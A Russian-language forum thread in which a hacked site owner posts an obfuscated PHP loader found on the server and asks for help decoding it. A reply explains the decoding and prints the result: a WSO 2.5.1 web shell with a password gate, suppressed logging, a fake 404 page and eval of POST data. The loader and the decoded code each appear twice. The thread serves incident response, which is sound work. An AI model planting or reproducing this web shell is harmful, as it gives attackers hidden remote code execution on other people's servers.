Помогите раскодировать код
Несколько недель взломали сайта и устроили рассылку спама. В тот раз удалось вылечить и удалить все вредоносные файлы. Как оказалось этого было не достаточно, так как рассылка через неделю снова возобновилась. Сперва, в корне сайта, создается файл buckup.php, а за ним и другие. Все файлы, на сколько я понимаю, закодированы base64 и обфусцированы. Очень нужна помощь людей владеющих техникой восстановления такого кода.
/** * GeSHi (C) 2004 - 2007 Nigel McNie, 2007 - 2008 Benny Baumann * (http://qbnz.com/highlighter/ and http://geshi.org/) */ .php.geshi_code {font-family:monospace;} .php.geshi_code .imp {font-weight: bold; color: red;} .php.geshi_code .kw1 {color: #b1b100;} .php.geshi_code .kw2 {color: #000000; font-weight: bold;} .php.geshi_code .kw3 {color: #990000;} .php.geshi_code .co1 {color: #666666; font-style: italic;} .php.geshi_code .co2 {color: #666666; font-style: italic;} .php.geshi_code .co3 {color: #0000cc; font-style: italic;} .php.geshi_code .co4 {color: #009933; font-style: italic;} .php.geshi_code .coMULTI {color: #666666; font-style: italic;} .php.geshi_code .es0 {color: #000099; font-weight: bold;} .php.geshi_code .es1 {color: #000099; font-weight: bold;} .php.geshi_code .es2 {color: #660099; font-weight: bold;} .php.geshi_code .es3 {color: #660099; font-weight: bold;} .php.geshi_code .es4 {color: #006699; font-weight: bold;} .php.geshi_code .es5 {color: #006699; font-weight: bold; font-style: italic;} .php.geshi_code .es6 {color: #009933; font-weight: bold;} .php.geshi_code .es_h {color: #000099; font-weight: bold;} .php.geshi_code .br0 {color: #009900;} .php.geshi_code .sy0 {color: #339933;} .php.geshi_code .sy1 {color: #000000; font-weight: bold;} .php.geshi_code .st0 {color: #0000ff;} .php.geshi_code .st_h {color: #0000ff;} .php.geshi_code .nu0 {color: #cc66cc;} .php.geshi_code .nu8 {color: #208080;} .php.geshi_code .nu12 {color: #208080;} .php.geshi_code .nu19 {color:#800080;} .php.geshi_code .me1 {color: #004000;} .php.geshi_code .me2 {color: #004000;} .php.geshi_code .re0 {color: #000088;} .php.geshi_code span.xtra { display:block; }
/** * GeSHi (C) 2004 - 2007 Nigel McNie, 2007 - 2008 Benny Baumann * (http://qbnz.com/highlighter/ and http://geshi.org/) */ .php.geshi_code {font-family:monospace;} .php.geshi_code .imp {font-weight: bold; color: red;} .php.geshi_code .kw1 {color: #b1b100;} .php.geshi_code .kw2 {color: #000000; font-weight: bold;} .php.geshi_code .kw3 {color: #990000;} .php.geshi_code .co1 {color: #666666; font-style: italic;} .php.geshi_code .co2 {color: #666666; font-style: italic;} .php.geshi_code .co3 {color: #0000cc; font-style: italic;} .php.geshi_code .co4 {color: #009933; font-style: italic;} .php.geshi_code .coMULTI {color: #666666; font-style: italic;} .php.geshi_code .es0 {color: #000099; font-weight: bold;} .php.geshi_code .es1 {color: #000099; font-weight: bold;} .php.geshi_code .es2 {color: #660099; font-weight: bold;} .php.geshi_code .es3 {color: #660099; font-weight: bold;} .php.geshi_code .es4 {color: #006699; font-weight: bold;} .php.geshi_code .es5 {color: #006699; font-weight: bold; font-style: italic;} .php.geshi_code .es6 {color: #009933; font-weight: bold;} .php.geshi_code .es_h {color: #000099; font-weight: bold;} .php.geshi_code .br0 {color: #009900;} .php.geshi_code .sy0 {color: #339933;} .php.geshi_code .sy1 {color: #000000; font-weight: bold;} .php.geshi_code .st0 {color: #0000ff;} .php.geshi_code .st_h {color: #0000ff;} .php.geshi_code .nu0 {color: #cc66cc;} .php.geshi_code .nu8 {color: #208080;} .php.geshi_code .nu12 {color: #208080;} .php.geshi_code .nu19 {color:#800080;} .php.geshi_code .me1 {color: #004000;} .php.geshi_code .me2 {color: #004000;} .php.geshi_code .re0 {color: #000088;} .php.geshi_code span.xtra { display:block; }
<?php
$vZHRT38 = Array('1'=>'Z', '0'=>'N', '3'=>'q', '2'=>'7', '5'=>'W', '4'=>'K', '7'=>'h', '6'=>'v', '9'=>'Y', '8'=>'I', 'A'=>'F', 'C'=>'E', 'B'=>'B', 'E'=>'a', 'D'=>'l', 'G'=>'e', 'F'=>'z', 'I'=>'i', 'H'=>'6', 'K'=>'L', 'J'=>'H', 'M'=>'9', 'L'=>'M', 'O'=>'C', 'N'=>'O', 'Q'=>'s', 'P'=>'3', 'S'=>'f', 'R'=>'c', 'U'=>'n', 'T'=>'y', 'W'=>'D', 'V'=>'u', 'Y'=>'Q', 'X'=>'p', 'Z'=>'m', 'a'=>'T', 'c'=>'P', 'b'=>'G', 'e'=>'V', 'd'=>'1', 'g'=>'S', 'f'=>'8', 'i'=>'k', 'h'=>'x', 'k'=>'2', 'j'=>'r', 'm'=>'0', 'l'=>'A', 'o'=>'w', 'n'=>'b', 'q'=>'U', 'p'=>'5', 's'=>'g', 'r'=>'t', 'u'=>'R', 't'=>'4', 'w'=>'o', 'v'=>'J', 'y'=>'X', 'x'=>'j', 'z'=>'d');
function v3374L6($vDO49XS, $v418ALS){$vH4BRRV = ''; for($i=0; $i < strlen($vDO49XS); $i++){$vH4BRRV .= isset($v418ALS[$vDO49XS[$i]]) ? $v418ALS[$vDO49XS[$i]] : $vDO49XS[$i];}
return base64_decode($vH4BRRV);}
$v8SHJ9I = 'vbAdzb7SRbAFRTlM8OviNWqt9ZuI1auI1ZqF1W8p0aqFLx1Z9xz7LWvZ9aqm0g82Oswi9kMQnP8scglI8kuZ0g82OIui1517z5hm'.
'ykAxzbD6nIlM8OzbE5hDRmd7nIR2OIui1517z5hmyPeF1eM7EZAt8WmszJvd1aQ4vbuD1ZAdnJuS9k77RU0DzOlM8OzyE5pin'.
'PzFKaCT0aCUNow4YbDVEeMF1yYwvkeTRZMTykh61TRQaDeLaOi2OiBXnZDSRkem4OzQnk'.
'zS1yvTnPvFvToo4aQ4YbDVEeMF1yYwvkd7GAMDGbexzyuXnkpSzbDr1gRQ'.
'LOi2OiBF1yuSzbDr1eMQE5dXzOso4aQ4YJ0DzAMr95zX9dMhz5Mm1y0SRUeVzbDr1gso4aQ4YbuD1ZDV1gsUed0cyd1A'.
'qD0vamtUKOlULItdKxCU4aQ4OZDZ4bzDzAMr95zX9dMhz5Mm1y0S1PBx4OiX8JQ48Ols8b1dnZ0mE5MV8AzaaP0mRZ'.
'DoRkh7Rk7DRTsi9yvT9yiX8JQ48Ols8Ols8OBT1yudRZtsEy0S9yvT9yiwvbATRZAp4gl/8bATRZApykd7ROsUed0cRPuTE'.
'yBFnbAFEbeFvTosvbATRZAp4glH8J0mRZDoRkh7Rk7DRTsi9yvT9yiXNows8OlsSYws8OlsvAMYad0q8Wmsed0c'.
'RPuTEyBFnbAFEbeF4OuSqCMaeOi2OIls8Oliym0camrvuglM8AzaaP0mRZDoRkh'.
'7Rk7DRTsiym0camrvugi2OUm4OZ1dnZ0mE5MV8JzFnmh61kDV4OisGows8OlsEbe71beT4Oz8eAuYKFCVLOlmLW'.
'YsaZMm8C16z5pivTi2OIls8OBiE5qw8xYo0O8XNoXMOsXZz5pxzbD6nIByqmMF1yuxnkMjE5qwvbQQ8Ouk4gB2OIls8Oliym0c'.
'amrvueQiEdmscglizxQ48Ols8J0Dzb06nkrX1gsiETosvJ9XNoXMOsXX1Is715dozJiwvbAdzb7SRbAFRTiX8JQ48Ols8bD'.
'Z4bDFRkem4OuSqCMaeAQURbAFRTzz4glZvIlwn5Yd4OuSqCMaeAQURbAFRTzz4glMcgli9yemEAMo9y0F4gi48Ols8Ols8OByqmM'.
'F1yuxnkMjE5qwn5Yd4OuSqmegeieg5Tz8eAuYym7cqdYUygiQ8Ou7zyuwyPB7RPLXNow48Ols8bDZ'.
'8Os7Ey0F1yYwvAMWamMKgqenn5Yd4OuSqmegeieg5Tz8eAuYym7cqdYUygDz4gBfSOlwvAMWamMKgqen'.
'n5Yd4OuSqmegeieg5Tz8eAuYym7cqdYUygDz8OCM8Ou7zyuwyPB7RPLX4'.
'Yws8Ols8Ols8JzFnmh61kDV4Oi2OUm4OZ1dnZ0mE5MV8bAxzbD6nDvW4OisGows8OlsE59w8qliydBcqdunvPlhvdmX8JQ48'.
'Ols8Ols8Oli9glM8bATRZAp4lws8Ols8Ols8Ols8OlIz5p7n5qI8Wm+8J'.
'BwRAMdnZAr1gsXKlws8Ols8Ols8Ols8OlIRb7oyP1DRU0XnktI8Wm+8JBwRJ1DRU0Xnktw4go48Ol'.
's8Ols8Ols8Ols8UzFndMk1yvFE5MV8IlMcIByqmMSeiegqmDcaIo48Ol'.
's8Ols8Ols8Ols8U071ZernkuD8IlMcIBlE5pXykzDzOsURkAZ1eMrnkuDvTi48Ols8Ols8OlXNows8Ol'.
's8Ols8bexEbfsRkeTE5AQEyXD4Ou74aQ48Ols8Jms15hF1gB2OIls8Ols8Ols1y17nOsiydB'.
'cqdunvPlhvdmXNows8OlsSYXMOZDZ4OBDnyBmGgsiydBcqdunvkCUygis4Yws8OlsE59wEy0F1yYwvbuD1ZAdnJuS950mE'.
'5MV4glZvIBZz5pxzbD6nDMDGbDFzJLwvkAxzbD6nIRsKIli1beZ9yeQz'.
'AM79PuXnktX4Yws8Ols8Ols8OuSqCMaeAQU9gzz8WmsvbuD1ZAdnJuS950mE5MVNows8'.
'Ols15hF1Yws8Ols8Ols8OuSqCMaeAQU9gzz8Wmsvd0D9mDV1ZfUNoXX1Iss85erRJup4OuSqCMa'.
'eAQU9gzz4glZvIBZz5pxzbD6nDMDGbDFzJLwvkAxzbD6nIRsKIliydBcqdunvkCUygis'.
'4Yws8Ols9kAQnAMdRkeTyk1dnZLwvkAxzbD6nIRsKIliydBcqdunvkCUygi2OZetEyY2';
eval(v3374L6($v8SHJ9I, $vZHRT38));?>
$vZHRT38 = Array('1'=>'Z', '0'=>'N', '3'=>'q', '2'=>'7', '5'=>'W', '4'=>'K', '7'=>'h', '6'=>'v', '9'=>'Y', '8'=>'I', 'A'=>'F', 'C'=>'E', 'B'=>'B', 'E'=>'a', 'D'=>'l', 'G'=>'e', 'F'=>'z', 'I'=>'i', 'H'=>'6', 'K'=>'L', 'J'=>'H', 'M'=>'9', 'L'=>'M', 'O'=>'C', 'N'=>'O', 'Q'=>'s', 'P'=>'3', 'S'=>'f', 'R'=>'c', 'U'=>'n', 'T'=>'y', 'W'=>'D', 'V'=>'u', 'Y'=>'Q', 'X'=>'p', 'Z'=>'m', 'a'=>'T', 'c'=>'P', 'b'=>'G', 'e'=>'V', 'd'=>'1', 'g'=>'S', 'f'=>'8', 'i'=>'k', 'h'=>'x', 'k'=>'2', 'j'=>'r', 'm'=>'0', 'l'=>'A', 'o'=>'w', 'n'=>'b', 'q'=>'U', 'p'=>'5', 's'=>'g', 'r'=>'t', 'u'=>'R', 't'=>'4', 'w'=>'o', 'v'=>'J', 'y'=>'X', 'x'=>'j', 'z'=>'d');
function v3374L6($vDO49XS, $v418ALS){$vH4BRRV = ''; for($i=0; $i < strlen($vDO49XS); $i++){$vH4BRRV .= isset($v418ALS[$vDO49XS[$i]]) ? $v418ALS[$vDO49XS[$i]] : $vDO49XS[$i];}
return base64_decode($vH4BRRV);}
$v8SHJ9I = 'vbAdzb7SRbAFRTlM8OviNWqt9ZuI1auI1ZqF1W8p0aqFLx1Z9xz7LWvZ9aqm0g82Oswi9kMQnP8scglI8kuZ0g82OIui1517z5hm'.
'ykAxzbD6nIlM8OzbE5hDRmd7nIR2OIui1517z5hmyPeF1eM7EZAt8WmszJvd1aQ4vbuD1ZAdnJuS9k77RU0DzOlM8OzyE5pin'.
'PzFKaCT0aCUNow4YbDVEeMF1yYwvkeTRZMTykh61TRQaDeLaOi2OiBXnZDSRkem4OzQnk'.
'zS1yvTnPvFvToo4aQ4YbDVEeMF1yYwvkd7GAMDGbexzyuXnkpSzbDr1gRQ'.
'LOi2OiBF1yuSzbDr1eMQE5dXzOso4aQ4YJ0DzAMr95zX9dMhz5Mm1y0SRUeVzbDr1gso4aQ4YbuD1ZDV1gsUed0cyd1A'.
'qD0vamtUKOlULItdKxCU4aQ4OZDZ4bzDzAMr95zX9dMhz5Mm1y0S1PBx4OiX8JQ48Ols8b1dnZ0mE5MV8AzaaP0mRZ'.
'DoRkh7Rk7DRTsi9yvT9yiX8JQ48Ols8Ols8OBT1yudRZtsEy0S9yvT9yiwvbATRZAp4gl/8bATRZApykd7ROsUed0cRPuTE'.
'yBFnbAFEbeFvTosvbATRZAp4glH8J0mRZDoRkh7Rk7DRTsi9yvT9yiXNows8OlsSYws8OlsvAMYad0q8Wmsed0c'.
'RPuTEyBFnbAFEbeF4OuSqCMaeOi2OIls8Oliym0camrvuglM8AzaaP0mRZDoRkh'.
'7Rk7DRTsiym0camrvugi2OUm4OZ1dnZ0mE5MV8JzFnmh61kDV4OisGows8OlsEbe71beT4Oz8eAuYKFCVLOlmLW'.
'YsaZMm8C16z5pivTi2OIls8OBiE5qw8xYo0O8XNoXMOsXZz5pxzbD6nIByqmMF1yuxnkMjE5qwvbQQ8Ouk4gB2OIls8Oliym0c'.
'amrvueQiEdmscglizxQ48Ols8J0Dzb06nkrX1gsiETosvJ9XNoXMOsXX1Is715dozJiwvbAdzb7SRbAFRTiX8JQ48Ols8bD'.
'Z4bDFRkem4OuSqCMaeAQURbAFRTzz4glZvIlwn5Yd4OuSqCMaeAQURbAFRTzz4glMcgli9yemEAMo9y0F4gi48Ols8Ols8OByqmM'.
'F1yuxnkMjE5qwn5Yd4OuSqmegeieg5Tz8eAuYym7cqdYUygiQ8Ou7zyuwyPB7RPLXNow48Ols8bDZ'.
'8Os7Ey0F1yYwvAMWamMKgqenn5Yd4OuSqmegeieg5Tz8eAuYym7cqdYUygDz4gBfSOlwvAMWamMKgqen'.
'n5Yd4OuSqmegeieg5Tz8eAuYym7cqdYUygDz8OCM8Ou7zyuwyPB7RPLX4'.
'Yws8Ols8Ols8JzFnmh61kDV4Oi2OUm4OZ1dnZ0mE5MV8bAxzbD6nDvW4OisGows8OlsE59w8qliydBcqdunvPlhvdmX8JQ48'.
'Ols8Ols8Oli9glM8bATRZAp4lws8Ols8Ols8Ols8OlIz5p7n5qI8Wm+8J'.
'BwRAMdnZAr1gsXKlws8Ols8Ols8Ols8OlIRb7oyP1DRU0XnktI8Wm+8JBwRJ1DRU0Xnktw4go48Ol'.
's8Ols8Ols8Ols8UzFndMk1yvFE5MV8IlMcIByqmMSeiegqmDcaIo48Ol'.
's8Ols8Ols8Ols8U071ZernkuD8IlMcIBlE5pXykzDzOsURkAZ1eMrnkuDvTi48Ols8Ols8OlXNows8Ol'.
's8Ols8bexEbfsRkeTE5AQEyXD4Ou74aQ48Ols8Jms15hF1gB2OIls8Ols8Ols1y17nOsiydB'.
'cqdunvPlhvdmXNows8OlsSYXMOZDZ4OBDnyBmGgsiydBcqdunvkCUygis4Yws8OlsE59wEy0F1yYwvbuD1ZAdnJuS950mE'.
'5MV4glZvIBZz5pxzbD6nDMDGbDFzJLwvkAxzbD6nIRsKIli1beZ9yeQz'.
'AM79PuXnktX4Yws8Ols8Ols8OuSqCMaeAQU9gzz8WmsvbuD1ZAdnJuS950mE5MVNows8'.
'Ols15hF1Yws8Ols8Ols8OuSqCMaeAQU9gzz8Wmsvd0D9mDV1ZfUNoXX1Iss85erRJup4OuSqCMa'.
'eAQU9gzz4glZvIBZz5pxzbD6nDMDGbDFzJLwvkAxzbD6nIRsKIliydBcqdunvkCUygis'.
'4Yws8Ols9kAQnAMdRkeTyk1dnZLwvkAxzbD6nIRsKIliydBcqdunvkCUygi2OZetEyY2';
eval(v3374L6($v8SHJ9I, $vZHRT38));?>
1 ответов
Последнюю строчку убери eval и поставь вместо него print
после этого запусти php script > result.php
в файле result.php будет то что закодировано.
В данном случае получишь это
$auth_pass = "d858bdbe4bfe3d2955326fb7a02fa545";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5.1');
if(get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin() {
header('HTTP/1.0 404 Not Found');
die("404");
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if(!empty($auth_pass)) {
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}
function actionRC() {
if(!@$_POST['p1']) {
$a = array(
"uname" => php_uname(),
"php_version" => phpversion(),
"wso_version" => WSO_VERSION,
"safemode" => @ini_get('safe_mode')
);
echo serialize($a);
} else {
eval($_POST['p1']);
}
}
if( empty($_POST['a']) )
if(isset($default_action) && function_exists('action' . $default_action))
$_POST['a'] = $default_action;
else
$_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
call_user_func('action' . $_POST['a']);
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5.1');
if(get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin() {
header('HTTP/1.0 404 Not Found');
die("404");
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if(!empty($auth_pass)) {
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}
function actionRC() {
if(!@$_POST['p1']) {
$a = array(
"uname" => php_uname(),
"php_version" => phpversion(),
"wso_version" => WSO_VERSION,
"safemode" => @ini_get('safe_mode')
);
echo serialize($a);
} else {
eval($_POST['p1']);
}
}
if( empty($_POST['a']) )
if(isset($default_action) && function_exists('action' . $default_action))
$_POST['a'] = $default_action;
else
$_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
call_user_func('action' . $_POST['a']);